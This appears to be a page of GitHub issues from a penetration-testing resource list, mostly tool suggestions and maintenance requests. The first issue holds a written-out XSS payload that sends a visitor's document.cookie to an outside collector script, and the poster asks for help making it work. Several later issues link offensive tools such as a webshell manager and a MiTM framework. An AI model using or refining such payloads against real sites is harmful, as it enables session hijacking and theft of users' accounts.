enaqx / awesome-pentest Goto Github PK

I'm doing an ethical hacking test, I tested an XSS payload : <script>alert("xss")</script> on a website, and the pop-up appears, so I want to collect user cookie

I created a getcookie.php file and a cookies.txt file and and I uploaded both files to a hosting server,
I placed the two files in the htdocs folder, which now contains index.html, getcookie.php and a cookies.txt

This is the getcookie.php file:

When I try this in the search box: : <script>document.location="http://website.com/getcookie.php?c="+document.cookie;</script>

I get this URL:
https://website2/search/?section=all&query=<script>document.location="http:SLASHSLASHwebsite.comSLASHgetcookie.php?c="+document.cookie;&path=SLASH

and I don't see any cookies in cookies.txt

What am I doing wrong, please? I've tried lot of payloads in the past 3 days but no results,
when I type http://website.com/getcookie.php in a new tab, I get the cookie but it's empty, I get this text : Cookie:

Thank you

Hi!
Below just a bunch of tools that are not in the main list and that I studied in preparation for the new PenTest+ {here you find the Exam Objectives for reference https://partners.comptia.org/docs/default-source/resources/comptia-pentest-pt0-002-exam-objectives-(4-0) }

[Cuckoo]
(https://github.com/cuckoosandbox/cuckoo)

[Pacu]
(https://github.com/RhinoSecurityLabs/pacu)

[CloudBrute]
(https://github.com/0xsha/CloudBrute)

[MetaGoofil]
(https://github.com/laramies/metagoofil)

[StegHide] (https://github.com/StefanoDeVuono/steghide)

[EAPhammer] (https://github.com/s0lst1c3/eaphammer)

[WiFite2]
(https://github.com/derv82/wifite2)

[Patator]
(https://github.com/lanjelot/patator)

[ScoutSuite]
(https://github.com/nccgroup/ScoutSuite)

[OpenStego]
(https://github.com/syvaidya/openstego)

[Objection]
(https://github.com/sensepost/objection)

Interested in making your list sindersorhus/awesome compliant?

By me quickly skimming through the list, it doesn't seem like there's a lot to be done for it to be compliant:

• Replacing ### with ## and #### with ###.
• Replacing ### with # in the title of the repo.
• Removing TravisCI icon (you get the email notifications when the build is failing anyway, having the icon makes the list more cluttered).
• Naming the table of content Contents.
• Adding the awesome badge.

Somebody already submitted your list in a PR, but it got denied because it didn't respect the requirements above.

If you're up for it, I'll make a quick little formatting PR to make it compliant.

I think those tools should be updated with the new ones from Hak5 like BashBunny and Packet Squirell. Also Pwn Plug could be added (https://store.pwnieexpress.com/product/pwn-plug-r3penetration-testing-device/)

Please add more web scanners:

https://github.com/maurosoria/dirsearch
https://github.com/HightechSec/git-scanner

Netsparker was bought by a company called Invicti, so you should probably update the links to reflect that.

Add "Pentest Collaboration Tool" to Pentest collaboration topic.
https://gitlab.com/invuls/pentest-projects/pcf

Very helpful app to MiTM attacks https://github.com/LionSec/xerosploit

Taking to another on our defcon slack community... they pointed out

https://gbhackers.com/hacking-tools-list/

and I noticed that all? of Their links (on page) are links to your github repo... no idea if that intentional or an issue for you.

Best regards, Mike

A webshell manager via terminal
Simple Usage : https://asciinema.org/a/130893

https://github.com/WangYihang/Webshell-Sniper

Hi everyone, I am currently looking for an avenue that permits me the ability to receive large files securely from clients so I can analyze them. I am specifically shopping for a cheap and possible free cloud platform that can help with this. Please does anyone have a solution?

https://travis-ci.org/enaqx/awesome-pentest/builds/202005150

Travis make failing PR because of others link not responding.

All my commit is good, the link no working is not from me but is already in the list.
Furthermore, when having about one hundred links there is nearly always a timeout. This may be only temporary. For example in https://travis-ci.org/enaqx/awesome-pentest/builds/202005150 I checked the link http://network-tools.com/ 40min later and it was good.

So I ask that travis only check new link or changed link in the commit, not already existing links. Travis checking all old link disable new PR to be validated.

http://www.md5crack.com/ seems dead

The script itself doesn't really do anything and suspiciously looks like a way to get people registered to several services (as per readme).

In any case, project abandoned, non working code. Probably doesnt belong here.

why not using the original?

It would be useful to put them in a different category or mark them with the date since they're not being maintained.

Hello there,

You can find here below some suggestions:

• In Static Analyzers: bandit for Python applications.
• In Web Exploitation:
  • 'fuzzdb'
  • 'webscreenshot'
  • 'eyewitness'
• In Transport Layer Security Tools: 'testssl.sh'
• In Windows Utilities:
  • 'crackmapexec' and 'DeathStar'
  • 'impacket'
• In OSINT Tools: 'zoomeye' (a chinese shodan-like)
• In Reverse Engineering Tools: 'frida'

Btw, thank you for aggregating such cool resources :)
Cheers.

No doubt that practicing our skills is important and CTFs provide a lot of opportunity for doing that. My question is twofold:

• Given that there are numerous lists of wargaming/hacking challenge sites (like Zapya's list and the AnarchoTechNYC Meta Wiki's Infosec § Hacking challenges list), is including them here useful? If so, cool, I have a lot of suggestions. ;)
• I'm not sure these are "practice CTFs" because "CTF" has a specific meaning; these are probably better termed "challenge sites" or "wargames."

CC: @techgaun, who I've asked questions like this before (in pull requests).

Can you add Commando VM pentesting distro for Windows 7 and Windows 10.

Any tools specifically for finding recording?
Ones I know people use:
KeepNote - discontinued
CherryTree - copy+paste issues

I understand that Splunk does not need a lot of functionality that a MySQL database would provide, and to index and perform searches on Big Data it might not be a good option to use a relational database.

Does Splunk Education use Lucene as a search engine, or have they made their on-disk data format?

I am sorry if there are any problems in the way I am asking the question.

Please help me

Regards
Gnanasekar

OWASP Maryam: Open-source Intelligence(OSINT) framework
https://github.com/saeeddhqan/Maryam

nevermind.

Please add in section section Conferences and Events / South America, H2HC (Hackers to Hackers Conference) that takes place annually in São Paulo, Brazil.
https://www.h2hc.com.br/h2hc/en/

I'm cautious about suggesting we add commercial tools directly, since that can look like advertising.

As such, I wanted to instead suggest that reviews site be added, for choosing based on needs.

Amass is the most In-depth subdomain enumeration tool and performs DNS OSINT. This could fall under Network Tools and/or OSINT Tools on your awesome list. The Amass project can be found using the link below:

https://github.com/caffix/amass

Thanks in advance!